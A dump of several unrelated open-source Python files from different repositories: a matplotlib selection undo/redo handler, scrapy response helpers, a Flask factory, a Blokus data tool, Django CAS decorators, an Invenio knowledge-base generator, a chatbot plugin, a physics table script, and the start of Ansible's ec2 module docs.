sel = np.setdiff1d(sel, mom.iflag)
if len(sel) == 0:
return # =========== NO VALID POINTS ================== >>>
#
# Undo/Redo in kwrite editor style
#
# If the selection/unselection is made after one or more Undo,
# the history before the current state is wiped out and cannot
# be Redo-ne
## #
## # If iSelQueue points not at the last element of the selection queue:
## #
## if mom.iSelQueue < len(mom.selQueue) - 1:
## # Wipe after iSelQueue
## mom.selQueue = mom.selQueue[:mom.iSelQueue+1]
## mom.buttonRedo.config(state='disabled') # Gray out Redo
if mom.SelectingON:
#
# Exclude from sel the points already selected
#
if len(mom.sel) > 0:
sel = np.setdiff1d(sel, mom.sel)
if len(sel) == 0:
return # =============== NO NEW SELECTIONS =============== >>>
#
# If iSelQueue points not at the last element of the
# selection queue:
#
if mom.iSelQueue < len(mom.selQueue) - 1:
# Wipe after iSelQueue
mom.selQueue = mom.selQueue[:mom.iSelQueue+1]
mom.buttonRedo.config(state='disabled') # Gray out Redo
#
# We are here in case user selected some not yet selected points
#
# Append the new selection to the Undo/ReDo queue
#
mom.selQueue.append({0:'select', 1:copy.copy(sel)})
#
# At the very beginning, enable button Undo and option Save
#
if mom.iSelQueue == 0:
mom.buttonUndo.config(state='normal') # Enable Undo
mom.menuSelect.entryconfig(2, state='normal') # Enable Save
mom.iSelQueue = mom.iSelQueue + 1
#
# Add the just selected points to the self.sel list of the
# mother panel keepeng the unique points only
#
if len(mom.sel) > 0:
mom.sel = np.union1d(mom.sel, sel)
else:
mom.sel = sel
if mom.unSelectingON:
#
# Exclude from sel the points that are not selected
#
if len(mom.sel) == 0: # If there are no selected points at all,
sel = np.array([], dtype=np.int64) # The unselection is empty
else: # Otherwise unselect only those selected:
sel = np.intersect1d(mom.sel, sel) # Leave only common points
if len(sel) == 0:
return # =============== NO NEW SELECTIONS =============== >>>
#
# If iSelQueue points not at the last element of the
# selection queue:
#
if mom.iSelQueue < len(mom.selQueue) - 1:
# Wipe after iSelQueue
mom.selQueue = mom.selQueue[:mom.iSelQueue+1]
mom.buttonRedo.config(state='disabled') # Gray out Redo
#
# We are here in case user unselected some selected points
#
# Append the new UNselection to the Undo/ReDo queue
#
mom.selQueue.append({0:'unselect', 1:copy.copy(sel)})
#
# At the very beginning, enable button Undo and option Save
#
if mom.iSelQueue == 0:
mom.buttonUndo.config(state='normal') # Enable Undo
mom.menuSelect.entryconfig(2, state='normal') # Enable Save
mom.iSelQueue = mom.iSelQueue + 1
#
# Remove the just selected points from the self.sel list of the
# mother panel keepeng the unique points only
#
if len(mom.sel) > 0:
mom.sel = np.setdiff1d(mom.sel, sel)
else:
mom.sel = sel
mom.nsel = len(mom.sel)
if len(mom.sel) > 0:
#
# Find the the new graph points to paint red
#
xsel = x[mom.sel]
ysel = y[mom.sel]
#
# Paint the selected points
#
if mom.plsel:
mom.plsel[0].remove() # Wipe out the red selected points
mom.plsel = mom.ax.plot(xsel, ysel, 'r.', ms=6.0, mew=0.1)
self.fig.canvas.show()
def disconnect(self):
self.fig.canvas.mpl_disconnect(self.__upd_press)
self.fig.canvas.mpl_disconnect(self.__upd_motion)
self.fig.canvas.mpl_disconnect(self.__upd_release)
self.fig.canvas.mpl_disconnect(self.__upd_key)
|
chekunkov/scrapy
|
refs/heads/master
|
scrapy/utils/response.py
|
28
|
"""
This module provides some useful functions for working with
scrapy.http.Response objects
"""
import os
import re
import weakref
import webbrowser
import tempfile
from twisted.web import http
from twisted.web.http import RESPONSES
from w3lib import html
from scrapy.http import HtmlResponse, TextResponse
from scrapy.utils.decorator import deprecated
@deprecated
def body_or_str(*a, **kw):
from scrapy.utils.iterators import _body_or_str
return _body_or_str(*a, **kw)
_baseurl_cache = weakref.WeakKeyDictionary()
def get_base_url(response):
"""Return the base url of the given response, joined with the response url"""
if response not in _baseurl_cache:
text = response.body_as_unicode()[0:4096]
_baseurl_cache[response] = html.get_base_url(text, response.url, \
response.encoding)
return _baseurl_cache[response]
_noscript_re = re.compile(u'<noscript>.*?</noscript>', re.IGNORECASE | re.DOTALL)
_script_re = re.compile(u'<script.*?>.*?</script>', re.IGNORECASE | re.DOTALL)
_metaref_cache = weakref.WeakKeyDictionary()
def get_meta_refresh(response):
"""Parse the http-equiv refrsh parameter from the given response"""
if response not in _metaref_cache:
text = response.body_as_unicode()[0:4096]
text = _noscript_re.sub(u'', text)
text = _script_re.sub(u'', text)
_metaref_cache[response] = html.get_meta_refresh(text, response.url, \
response.encoding)
return _metaref_cache[response]
def response_status_message(status):
"""Return status code plus status text descriptive message
>>> response_status_message(200)
'200 OK'
>>> response_status_message(404)
'404 Not Found'
"""
return '%s %s' % (status, http.responses.get(int(status)))
def response_httprepr(response):
"""Return raw HTTP representation (as string) of the given response. This
is provided only for reference, since it's not the exact stream of bytes
that was received (that's not exposed by Twisted).
"""
s = "HTTP/1.1 %d %s\r\n" % (response.status, RESPONSES.get(response.status, ''))
if response.headers:
s += response.headers.to_string() + "\r\n"
s += "\r\n"
s += response.body
return s
def open_in_browser(response, _openfunc=webbrowser.open):
"""Open the given response in a local web browser, populating the <base>
tag for external links to work
"""
# XXX: this implementation is a bit dirty and could be improved
body = response.body
if isinstance(response, HtmlResponse):
if '<base' not in body:
body = body.replace('<head>', '<head><base href="%s">' % response.url)
ext = '.html'
elif isinstance(response, TextResponse):
ext = '.txt'
else:
raise TypeError("Unsupported response type: %s" % \
response.__class__.__name__)
fd, fname = tempfile.mkstemp(ext)
os.write(fd, body)
os.close(fd)
return _openfunc("file://%s" % fname)
|
felix1m/knowledge-base
|
refs/heads/master
|
kb/factory.py
|
1
|
# -*- coding: utf-8 -*-
"""
kb.factory
~~~~~~~~~~~~~~~~
kb factory module
"""
import os
from flask import Flask
from flask_security import SQLAlchemyUserDatastore
from .core import db, mail, security, api_manager
from .helpers import register_blueprints
from .middleware import HTTPMethodOverrideMiddleware
from .models import User, Role
from .logger import setup_logging
def create_app(package_name, package_path, settings_override=None,
register_security_blueprint=True, create_api_manager=False):
"""Returns a :class:`Flask` application instance configured with common
functionality for the kb platform.
:param package_name: application package name
:param package_path: application package path
:param settings_override: a dictionary of settings to override
:param register_security_blueprint: flag to specify if the Flask-Security
Blueprint should be registered. Defaults
to `True`.
"""
app = Flask(package_name, instance_relative_config=True)
app.config.from_object('kb.settings')
app.config.from_pyfile('settings.cfg', silent=True)
app.config.from_object(settings_override)
db.init_app(app)
mail.init_app(app)
security.init_app(app, SQLAlchemyUserDatastore(db, User, Role),
register_blueprint=register_security_blueprint)
if create_api_manager:
# Init the Flask-Restless API manager.
api_manager.init_app(app, flask_sqlalchemy_db=db)
register_blueprints(app, package_name, package_path)
app.wsgi_app = HTTPMethodOverrideMiddleware(app.wsgi_app)
if not app.debug:
setup_logging(app)
return app
|
yezhangxiang/blokus
|
refs/heads/master
|
generate_tensor.py
|
1
|
import json
import numpy as np
import matplotlib.pyplot as plt
import math
import os
import sys
from utility import process_file_list, show_channels
from multiway_tree import add_node, write_tree
from matrix2tensor import matrix2tensor
channel_size = 20
def json2tensor(json_file, chessman_dic, chessman_state_id, output_folder, is_show_tensor=False):
with open(json_file) as json_f:
file_name = os.path.basename(json_file)
sub_output_folder = os.path.join(output_folder, file_name)
if not os.path.exists(sub_output_folder):
os.makedirs(sub_output_folder)
label = {}
chessboard_player_id = np.zeros((channel_size, channel_size))
chessboard_chessman_id = np.zeros((channel_size, channel_size))
chessboard_hand_no = np.zeros((channel_size, channel_size))
for line in json_f:
start_index = line.find('{')
if start_index == -1:
continue
line_sub = line[start_index:]
msg = json.loads(line_sub)
if msg['msg_name'] == 'game_start':
pass
elif msg['msg_name'] == 'notification':
msg_data = msg['msg_data']
player_id = msg_data['player_id']
chessman = msg_data['chessman']
if 'id' not in chessman:
continue
chessman_id = chessman['id']
squareness = chessman['squareness']
hand_no = msg_data['hand']['no']
chessboard_player_id_regulated = regular_chessboard(chessboard_player_id, player_id,
is_replace_player_id=True)
chessboard_chessman_id_regulated = regular_chessboard(chessboard_chessman_id, player_id)
chessboard_hand_no_regulated = regular_chessboard(chessboard_hand_no, player_id)
for grid in squareness:
chessboard_player_id[grid['x']][grid['y']] = player_id
chessboard_chessman_id[grid['x']][grid['y']] = chessman_id
chessboard_hand_no[grid['x']][grid['y']] = hand_no
chessboard_player_id_regulated_new = regular_chessboard(chessboard_player_id, player_id,
is_replace_player_id=True)
chessman_in_board_regulated = chessboard_player_id_regulated_new - chessboard_player_id_regulated
squareness_regulated = chessman_in_board2squareness(chessman_in_board_regulated)
regular_chessman, regular_x, regular_y = squareness2regular_chessman(squareness_regulated)
state = find_chessman(chessman_dic[chessman_id], regular_chessman)
tensor = matrix2tensor(chessboard_player_id_regulated,
chessboard_chessman_id_regulated,
chessboard_hand_no_regulated)
show_channels(tensor, is_show_tensor, True)
tensor_save_file = os.path.join(sub_output_folder, str(hand_no) + '.npy')
np.save(tensor_save_file, tensor)
add_node(label, [player_id, tensor_save_file],
[chessman_id, state, regular_x, regular_y,
channel_size * regular_y + regular_x +
channel_size * channel_size * chessman_state_id[chessman_id][state]])
elif msg['msg_name'] == 'game_over':
if 'msg_data' not in msg:
continue
msg_data = msg['msg_data']
teams = msg_data['teams']
win_team = (teams[0] if teams[0]['score'] >= teams[1]['score'] else teams[1])
win_players = win_team['players']
win_players_id = [win_players[0]['player_id'], win_players[1]['player_id']]
if win_players_id[0] not in label or win_players_id[1] not in label:
continue
win_lable = {win_players_id[0]: label[win_players_id[0]],
win_players_id[1]: label[win_players_id[1]]}
write_tree(win_lable, os.path.join(sub_output_folder, 'win_label.csv'),
['player', 'filename', 'chessman', 'state', 'x', 'y', 'class'])
write_tree(label, os.path.join(sub_output_folder, 'label.csv'),
['player', 'filename', 'chessman', 'state', 'x', 'y', 'class'])
def regular_chessboard(chessboard, player_id, is_replace_player_id=False):
rot_k = player_id - 1
chessboard_regulated = chessboard.copy()
if is_replace_player_id:
chessboard_regulated = np.zeros((channel_size, channel_size))
for i in range(1, 5):
regular_id = (i - rot_k) % 4
if regular_id == 0:
regular_id = 4
chessboard_regulated[chessboard == i] = regular_id
chessboard_regulated = np.rot90(chessboard_regulated, rot_k)
return chessboard_regulated
def chessman_in_board2squareness(chessman_in_board):
squareness = []
for i in range(channel_size):
for j in range(channel_size):
if chessman_in_board[i][j] != 0:
squareness.append({'x': i, 'y': j})
return squareness
def squareness2regular_chessman(squareness):
x = [grid['x'] for grid in squareness]
y = [grid['y'] for grid in squareness]
x_min = min(x)
y_min = min(y)
x_regular = [x_i - x_min for x_i in x]
y_regular = [y_i - y_min for y_i in y]
chesssman = np.zeros((max(x_regular) + 1, max(y_regular) + 1))
for i in range(len(x_regular)):
chesssman[x_regular[i]][y_regular[i]] = 1
return chesssman, x_min, y_min
def extend_all_chessman(is_show=False):
chessman_dic = {
101: [np.array([[1]])],
201: [np.array([[1, 1]])],
301: [np.array([[1, 1, 1]])],
302: [np.array([[1, 1], [1, 0]])],
401: [np.array([[1, 1, 1, 1]])],
402: [np.array([[0, 1, 0], [1, 1, 1]])],
403: [np.array([[1, 1, 0], [0, 1, 1]])],
404: [np.array([[1, 0, 0], [1, 1, 1]])],
405: [np.array([[1, 1], [1, 1]])],
501: [np.array([[1, 1, 1, 1, 1]])],
502: [np.array([[1, 1, 1], [0, 1, 0], [0, 1, 0]])],
503: [np.array([[0, 1, 0], [1, 1, 1], [0, 1, 0]])],
504: [np.array([[1, 0, 0], [1, 0, 0], [1, 1, 1]])],
505: [np.array([[0, 0, 1], [0, 1, 1], [1, 1, 0]])],
506: [np.array([[1, 1, 1], [0, 1, 1]])],
507: [np.array([[1, 1, 1, 1], [0, 1, 0, 0]])],
508: [np.array([[1, 0, 0, 0], [1, 1, 1, 1]])],
509: [np.array([[1, 1, 1], [1, 0, 1]])],
510: [np.array([[0, 0, 1, 1], [1, 1, 1, 0]])],
511: [np.array([[0, 1, 1], [0, 1, 0], [1, 1, 0]])],
512: [np.array([[1, 1, 0], [0, 1, 1], [0, 1, 0]])],
}
for name, chessman_list in chessman_dic.items():
chessman = chessman_list[0]
for i in range(8):
chessman = np.rot90(chessman, i)
if i == 4:
chessman = np.transpose(chessman)
if find_chessman(chessman_list, chessman) == -1:
chessman_list.append(chessman)
if is_show:
for name, chessman_list in chessman_dic.items():
channel_num = len(chessman_list)
row = int(math.sqrt(channel_num))
column = int(math.ceil(channel_num / row))
fig, axes = plt.subplots(row, column)
fig.canvas.set_window_title(str(name))
for i, chessman in enumerate(chessman_list):
cur_ax = axes if channel_num == 1 else axes[i] if channel_num < 3 else axes[
int(i / column), int(i % column)]
cur_ax.imshow(chessman)
plt.show()
return chessman_dic
def get_chessman_state_index(chessman_dic):
chessman_state_id = {}
chessman_state_id_inverse = {}
dic_sorted = sorted(chessman_dic.items(), key=lambda d: d[0])
index = 0
for item in dic_sorted:
name = item[0]
chessman_list = item[1]
for state, chessman_item in enumerate(chessman_list):
add_node(chessman_state_id, [name, state], index)
add_node(chessman_state_id_inverse, [index], [name, state])
index += 1
return chessman_state_id, chessman_state_id_inverse
def find_chessman(chessman_list, chessman):
for i, chessman_item in enumerate(chessman_list):
if chessman.shape == chessman_item.shape and np.sum(np.abs(chessman - chessman_item)) == 0:
return i
return -1
if __name__ == '__main__':
chessman_dic = extend_all_chessman()
chessman_state_id, _ = get_chessman_state_index(chessman_dic)
for argv_i in range(1, len(sys.argv), 2):
process_file_list(sys.argv[argv_i], json2tensor, True, chessman_dic, chessman_state_id, sys.argv[argv_i + 1],
False)
|
justintweaver/mtchi-cert-game
|
refs/heads/master
|
makahiki/apps/lib/django_cas/decorators.py
|
9
|
"""Replacement authentication decorators that work around redirection loops"""
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.utils.http import urlquote
__all__ = ['login_required', 'permission_required', 'user_passes_test']
def user_passes_test(test_func, login_url=None,
redirect_field_name=REDIRECT_FIELD_NAME):
"""Replacement for django.contrib.auth.decorators.user_passes_test that
returns 403 Forbidden if the user is already logged in.
"""
if not login_url:
from django.conf import settings
login_url = settings.LOGIN_URL
def decorator(view_func):
@wraps(view_func)
def wrapper(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
elif request.user.is_authenticated():
return HttpResponseForbidden('<h1>Permission denied</h1>')
else:
path = '%s?%s=%s' % (login_url, redirect_field_name,
urlquote(request.get_full_path()))
return HttpResponseRedirect(path)
return wrapper
return decorator
def permission_required(perm, login_url=None):
"""Replacement for django.contrib.auth.decorators.permission_required that
returns 403 Forbidden if the user is already logged in.
"""
return user_passes_test(lambda u: u.has_perm(perm), login_url=login_url)
|
ioannistsanaktsidis/invenio
|
refs/heads/prod
|
modules/bibrank/lib/bibrankgkb.py
|
25
|
## -*- mode: python; coding: utf-8; -*-
##
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Usage: bibrankgkb %s [options]
Examples:
bibrankgkb --input=bibrankgkb.cfg --output=test.kb
bibrankgkb -otest.kb -v9
bibrankgkb -v9
Generate options:
-i, --input=file input file, default from /etc/bibrank/bibrankgkb.cfg
-o, --output=file output file, will be placed in current folder
General options:
-h, --help print this help and exit
-V, --version print version and exit
-v, --verbose=LEVEL verbose level (from 0 to 9, default 1)
"""
__revision__ = "$Id$"
import getopt
import sys
import time
import re
import ConfigParser
from invenio.urlutils import make_invenio_opener
from invenio.config import CFG_ETCDIR
from invenio.dbquery import run_sql
BIBRANK_OPENER = make_invenio_opener('BibRank')
opts_dict = {}
task_id = -1
def bibrankgkb(config):
"""Generates a .kb file based on input from the configuration file"""
if opts_dict["verbose"] >= 1:
write_message("Running: Generate Knowledgebase.")
journals = {}
journal_src = {}
i = 0
#Reading the configuration file
while config.has_option("bibrankgkb","create_%s" % i):
cfg = config.get("bibrankgkb", "create_%s" % i).split(",,")
conv = {}
temp = {}
#Input source 1, either file, www or from db
if cfg[0] == "file":
conv = get_from_source(cfg[0], cfg[1])
del cfg[0:2]
elif cfg[0] == "www":
j = 0
urls = {}
while config.has_option("bibrankgkb", cfg[1] % j):
urls[j] = config.get("bibrankgkb", cfg[1] % j)
j = j + 1
conv = get_from_source(cfg[0], (urls, cfg[2]))
del cfg[0:3]
elif cfg[0] == "db":
conv = get_from_source(cfg[0], (cfg[1], cfg[2]))
del cfg[0:3]
if not conv:
del cfg[0:2]
else:
if opts_dict["verbose"] >= 9:
write_message("Using last resource for converting values.")
#Input source 2, either file, www or from db
if cfg[0] == "file":
temp = get_from_source(cfg[0], cfg[1])
elif cfg[0] == "www":
j = 0
urls = {}
while config.has_option("bibrankgkb", cfg[1] % j):
urls[j] = config.get("bibrankgkb", cfg[1] % j)
j = j + 1
temp = get_from_source(cfg[0], (urls, cfg[2]))
elif cfg[0] == "db":
temp = get_from_source(cfg[0], (cfg[1], cfg[2]))
i = i + 1
#If a conversion file is given, the names will be converted to the correct convention
if len(conv) != 0:
if opts_dict["verbose"] >= 9:
write_message("Converting between naming conventions given.")
temp = convert(conv, temp)
if len(journals) != 0:
for element in temp.keys():
if not journals.has_key(element):
journals[element] = temp[element]
else:
journals = temp
#Writing output file
if opts_dict["output"]:
f = open(opts_dict["output"], 'w')
f.write("#Created by %s\n" % __revision__)
f.write("#Sources:\n")
for key in journals.keys():
f.write("%s---%s\n" % (key, journals[key]))
f.close()
if opts_dict["verbose"] >= 9:
write_message("Output complete: %s" % opts_dict["output"])
write_message("Number of hits: %s" % len(journals))
if opts_dict["verbose"] >= 9:
write_message("Result:")
for key in journals.keys():
write_message("%s---%s" % (key, journals[key]))
write_message("Total nr of lines: %s" % len(journals))
def showtime(timeused):
if opts_dict["verbose"] >= 9:
write_message("Time used: %d second(s)." % timeused)
def get_from_source(type, data):
"""Read a source based on the input to the function"""
datastruct = {}
if type == "db":
jvalue = run_sql(data[0])
jname = dict(run_sql(data[1]))
if opts_dict["verbose"] >= 9:
write_message("Reading data from database using SQL statements:")
write_message(jvalue)
write_message(jname)
for key, value in jvalue:
if jname.has_key(key):
key2 = jname[key].strip()
datastruct[key2] = value
#print "%s---%s" % (key2, value)
elif type == "file":
input = open(data, 'r')
if opts_dict["verbose"] >= 9:
write_message("Reading data from file: %s" % data)
data = input.readlines()
datastruct = {}
for line in data:
#print line
if not line[0:1] == "#":
key = line.strip().split("---")[0].split()
value = line.strip().split("---")[1]
datastruct[key] = value
#print "%s---%s" % (key,value)
elif type == "www":
if opts_dict["verbose"] >= 9:
write_message("Reading data from www using regexp: %s" % data[1])
write_message("Reading data from url:")
for link in data[0].keys():
if opts_dict["verbose"] >= 9:
write_message(data[0][link])
page = BIBRANK_OPENER.open(data[0][link])
input = page.read()
#Using the regexp from config file
reg = re.compile(data[1])
iterator = re.finditer(reg, input)
for match in iterator:
if match.group("value"):
key = match.group("key").strip()
value = match.group("value").replace(",", ".")
datastruct[key] = value
if opts_dict["verbose"] == 9:
print "%s---%s" % (key, value)
return datastruct
def convert(convstruct, journals):
"""Converting between names"""
if len(convstruct) > 0 and len(journals) > 0:
invconvstruct = dict(map(lambda x: (x[1], x[0]), convstruct.items()))
tempjour = {}
for name in journals.keys():
if convstruct.has_key(name):
tempjour[convstruct[name]] = journals[name]
elif invconvstruct.has_key(name):
tempjour[name] = journals[name]
return tempjour
else:
return journals
def write_message(msg, stream = sys.stdout):
"""Write message and flush output stream (may be sys.stdout or sys.stderr). Useful for debugging stuff."""
if stream == sys.stdout or stream == sys.stderr:
stream.write(time.strftime("%Y-%m-%d %H:%M:%S --> ", time.localtime()))
try:
stream.write("%s\n" % msg)
except UnicodeEncodeError:
stream.write("%s\n" % msg.encode('ascii', 'backslashreplace'))
stream.flush()
else:
sys.stderr.write("Unknown stream %s. [must be sys.stdout or sys.stderr]\n" % stream)
return
def usage(code, msg=''):
"Prints usage for this module."
if msg:
sys.stderr.write("Error: %s.\n" % msg)
print >> sys.stderr, \
""" Usage: %s [options]
Examples:
%s --input=bibrankgkb.cfg --output=test.kb
%s -otest.kb -v9
%s -v9
Generate options:
-i, --input=file input file, default from /etc/bibrank/bibrankgkb.cfg
-o, --output=file output file, will be placed in current folder
General options:
-h, --help print this help and exit
-V, --version print version and exit
-v, --verbose=LEVEL verbose level (from 0 to 9, default 1)
""" % ((sys.argv[0],) * 4)
sys.exit(code)
def command_line():
global opts_dict
long_flags = ["input=", "output=", "help", "version", "verbose="]
short_flags = "i:o:hVv:"
format_string = "%Y-%m-%d %H:%M:%S"
sleeptime = ""
try:
opts, args = getopt.getopt(sys.argv[1:], short_flags, long_flags)
except getopt.GetoptError, err:
write_message(err, sys.stderr)
usage(1)
if args:
usage(1)
opts_dict = {"input": "%s/bibrank/bibrankgkb.cfg" % CFG_ETCDIR, "output":"", "verbose":1}
sched_time = time.strftime(format_string)
user = ""
try:
for opt in opts:
if opt == ("-h","") or opt == ("--help",""):
usage(1)
elif opt == ("-V","") or opt == ("--version",""):
print __revision__
sys.exit(1)
elif opt[0] in ["--input", "-i"]:
opts_dict["input"] = opt[1]
elif opt[0] in ["--output", "-o"]:
opts_dict["output"] = opt[1]
elif opt[0] in ["--verbose", "-v"]:
opts_dict["verbose"] = int(opt[1])
else:
usage(1)
startCreate = time.time()
file = opts_dict["input"]
config = ConfigParser.ConfigParser()
config.readfp(open(file))
bibrankgkb(config)
if opts_dict["verbose"] >= 9:
showtime((time.time() - startCreate))
except StandardError, e:
write_message(e, sys.stderr)
sys.exit(1)
return
def main():
command_line()
if __name__ == "__main__":
main()
|
JacobCallahan/CloudBot
|
refs/heads/master
|
plugins/eightball.py
|
35
|
import os
import asyncio
import codecs
import random
from cloudbot import hook
from cloudbot.util import colors
@hook.on_start()
def load_responses(bot):
path = os.path.join(bot.data_dir, "8ball_responses.txt")
global responses
with codecs.open(path, encoding="utf-8") as f:
responses = [line.strip() for line in
f.readlines() if not line.startswith("//")]
@asyncio.coroutine
@hook.command("8ball", "8", "eightball")
def eightball(action):
"""<question> - asks the all knowing magic electronic eight ball <question>"""
magic = random.choice(responses)
message = colors.parse("shakes the magic 8 ball... {}".format(magic))
action(message)
|
lkostler/AME60649_project_final
|
refs/heads/master
|
moltemplate/moltemplate/examples/coarse_grained_examples/protein_folding_examples/1bead+chaperone/frustrated+minichaperone/moltemplate_files/generate_tables/calc_chaperone_table.py
|
90
|
#!/usr/bin/env python
# Calculate a table of pairwise energies and forces between atoms in the
# protein and a chaperone provided in the supplemental materials section of:
# AI Jewett, A Baumketner and J-E Shea, PNAS, 101 (36), 13192-13197, (2004)
# This is stored in a tabulated force field with a singularity at a distance R.
#
# To calculate the table for interaction between
# ...the chaperone and a hydrophobic bead (2004 PNAS paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 6.0 0.475 0.0 5.9 1181
# ...the chaperone and a hydrophilic bead (2004 PNAS paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 6.0 0.0 0.0 5.9 1181
# ...the chaperone and a hydrophobic bead (2006 JMB paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 3.0 0.60 3.1 8.0 981 True
# ...the chaperone and a hydrophilic bead (2006 JMB paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 3.0 0.0 3.1 8.0 981 True
from math import *
import sys
def U(r, eps, sigma, R, h):
#print('r='+str(r)+' eps='+str(eps)+' s='+str(sigma)+' R='+str(R)+' h='+str(h))
# Formula is undefined at r=0, but you can take the limit:
if r <= 0:
return 4.0*pi*R*R*4.0*eps*(pow((sigma/R), 12.0)
- h*pow((sigma/R), 6.0))
xp = sigma/(r+R)
xm = sigma/(r-R)
term10 = pow(xm, 10.0) - pow(xp, 10.0)
term4 = pow(xm, 4.0) - pow(xp, 4.0)
return 4.0*pi*eps*(R/r) * (0.2*term10 - 0.5*h*term4)
def F(r, eps, sigma, R, h):
# Formula is undefined at r=0, but you can take the limit:
if r <= 0:
return 0.0
product_term_a = U(r, eps, sigma, R, h) / r
ixp = (r+R)/sigma
ixm = (r-R)/sigma
dix_dr = 1.0/sigma
term10 = (10.0/sigma)*(pow(ixm, -11.0) - pow(ixp, -11.0))
term4 = (4.0/sigma)*(pow(ixm, -5.0) - pow(ixp, -5.0))
product_term_b = 4.0*eps*pi*(R/r) * (0.2*term10 - 0.5*h*term4)
return product_term_a + product_term_b
class InputError(Exception):
""" A generic exception object containing a string for error reporting.
"""
def __init__(self, err_msg):
self.err_msg = err_msg
def __str__(self):
return self.err_msg
def __repr__(self):
return str(self)
if len(sys.argv) < 8:
sys.stderr.write("Error: expected 7 arguments:\n"
"\n"
"Usage: "+sys.argv[0]+" epsilon sigma R h rmin rmax N\n\n")
sys.exit(-1)
epsilon = float(sys.argv[1])
sigma = float(sys.argv[2])
R = float(sys.argv[3])
h = float(sys.argv[4])
rmin = float(sys.argv[5])
rmax = float(sys.argv[6])
N = int(sys.argv[7])
subtract_Urcut = False
if len(sys.argv) == 9:
subtract_Urcut = True
rcut = rmax
for i in range(0,N):
r = rmin + i*(rmax-rmin)/(N-1)
U_r = U(r, epsilon, sigma, R, h)
F_r = F(r, epsilon, sigma, R, h)
if subtract_Urcut:
U_r -= U(rcut, epsilon, sigma, R, h)
if (r >= rcut) or (i==N-1):
U_r = 0.0
F_r = 0.0
print(str(i+1)+' '+str(r)+' '+str(U_r)+' '+str(F_r))
|
CamelBackNotation/CarnotKE
|
refs/heads/master
|
jyhton/lib-python/2.7/test/test_distutils.py
|
139
|
"""Tests for distutils.
The tests for distutils are defined in the distutils.tests package;
the test_suite() function there returns a test suite that's ready to
be run.
"""
from test import test_support
import distutils.tests
def test_main():
test_support.run_unittest(distutils.tests.test_suite())
test_support.reap_children()
if __name__ == "__main__":
test_main()
|
e-gob/plataforma-kioscos-autoatencion
|
refs/heads/master
|
scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2.py
|
9
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: ec2
short_description: create, terminate, start or stop an instance in ec2
description:
- Creates or terminates ec2 instances.
- C(state=restarted) was added in 2.2
version_added: "0.9"
options:
key_name:
description:
- key pair to use on the instance
required: false
default: null
aliases: ['keypair']
id:
version_added: "1.1"
description:
- identifier for this instance or set of instances, so that the module will be idempotent with respect to EC2 instances.
This identifier is valid for at least 24 hours after the termination of the instance, and should not be reused for another call later on.
For details, see the description of client token at U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/Run_Instance_Idempotency.html).
required: false
default: null
aliases: []
group:
description:
- security group (or list of groups) to use with the instance
required: false
default: null
aliases: [ 'groups' ]
group_id:
version_added: "1.1"
description:
- security group id (or list of ids) to use with the instance
required: false
default: null
aliases: []
region:
version_added: "1.2"
description:
- The AWS region to use. Must be specified if ec2_url is not used.
If not specified then the value of the EC2_REGION environment variable, if any, is used.
See U(http://docs.aws.amazon.com/general/latest/gr/rande.html#ec2_region)
required: false
default: null
aliases: [ 'aws_region', 'ec2_region' ]
zone:
version_added: "1.2"
description:
- AWS availability zone in which to launch the instance
required: false
default: null
aliases: [ 'aws_zone', 'ec2_zone' ]
instance_type:
description:
- instance type to use for the instance, see U(http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html)
required: true
default: null
aliases: []
tenancy:
version_added: "1.9"
description:
- An instance with a tenancy of "dedicated" runs on single-tenant hardware and can only be launched into a VPC.
Note that to use dedicated tenancy you MUST specify a vpc_subnet_id as well. Dedicated tenancy is not available for EC2 "micro" instances.
required: false
default: default
choices: [ "default", "dedicated" ]
aliases: []
spot_price:
version_added: "1.5"
description:
- Maximum spot price to bid, If not set a regular on-demand instance is requested. A spot request is made with this maximum bid.
When it is filled, the instance is started.
required: false
default: null
aliases: []
spot_type:
version_added: "2.0"
description:
- Type of spot request; one of "one-time" or "persistent". Defaults to "one-time" if not supplied.
required: false
default: "one-time"
choices: [ "one-time", "persistent" ]
aliases: []
image:
description:
- I(ami) ID to use for the instance
required: true
default: null
aliases: []
kernel:
description:
- kernel I(eki) to use for the instance
required: false
default: null
aliases: []
ramdisk:
description:
- ramdisk I(eri) to use for the instance
required: false
default: null
aliases: []
wait:
description:
- wait for the instance to reach its desired state before returning. Does not wait for SSH, see 'wait_for' example for details.
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 300
aliases: []
spot_wait_timeout:
version_added: "1.5"
description:
- how long to wait for the spot instance request to be fulfilled
default: 600
aliases: []
count:
description:
- number of instances to launch
required: False
default: 1
aliases: []
monitoring:
version_added: "1.1"
description:
- enable detailed monitoring (CloudWatch) for instance
required: false
default: no
choices: [ "yes", "no" ]
aliases: []
user_data:
version_added: "0.9"
description:
